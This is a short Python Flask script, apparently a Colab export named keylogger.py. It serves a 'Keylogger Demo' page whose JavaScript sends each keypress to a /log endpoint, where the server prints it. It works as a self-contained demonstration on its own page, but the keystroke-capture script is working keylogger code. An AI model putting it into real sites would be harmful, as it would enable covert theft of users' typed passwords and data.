# -*- coding: utf-8 -*-
"""keylogger.py.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/159sGfOqV_EipwfFTA6maALXqeDnpt5lE
"""

from flask import Flask, request

app = Flask(__name__)

@app.route('/')
def index():
    # Serve a simple page with JavaScript keylogger
    return '''
        <!DOCTYPE html>
        <html lang="en">
        <head>
            <title>Keylogger Demo</title>
            <script>
                document.addEventListener('keypress', function(e) {
                    fetch('/log', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ key: e.key })
                    });
                });
            </script>
        </head>
        <body>
            <h1>Keylogger Test Page</h1>
            <p>Type something here:</p>
            <input type="text" />
        </body>
        </html>
    '''

@app.route('/log', methods=['POST'])
def log_key():
    # Log the captured key to the console
    data = request.get_json()
    if data and 'key' in data:
        print(f"Key pressed: {data['key']}")
    return '', 204

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)